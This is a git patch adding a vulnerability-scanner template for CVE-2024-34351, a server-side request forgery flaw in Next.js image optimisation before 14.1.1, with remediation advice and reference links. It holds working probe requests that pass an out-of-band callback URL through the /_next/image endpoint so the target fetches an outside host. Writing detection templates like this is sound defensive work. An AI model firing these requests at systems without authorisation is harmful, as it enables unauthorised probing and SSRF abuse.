From d4415866ae6aa55f2dadf2af3980d6b9ce93e09f Mon Sep 17 00:00:00 2001
From: Dominique RIGHETTO <righettod@users.noreply.github.com>
Date: Mon, 15 Jul 2024 10:52:14 +0200
Subject: [PATCH] Add files via upload

---
 http/cves/2024/CVE-2024-34351.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-34351.yaml

diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml
new file mode 100644
index 0000000000..b745941348
--- /dev/null
+++ b/http/cves/2024/CVE-2024-34351.yaml
@@ -0,0 +1,28 @@
+id: CVE-2024-34351
+
+info:
+  name: Next.js - SSRF
+  author: righettod
+  severity: high
+  remediation: Upgrade to Next.js version 14.1.1 or higher.
+  description: |
+    Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.
+  reference:
+    - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-34351
+    - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g    
+  metadata:
+    max-request: 2
+  tags: cve,cve2024,vercel,nextjs,ssrf
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}'
+      - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}'
+
+    matchers:
+        - type: word
+          part: interactsh_protocol
+          words:
+            - 'http'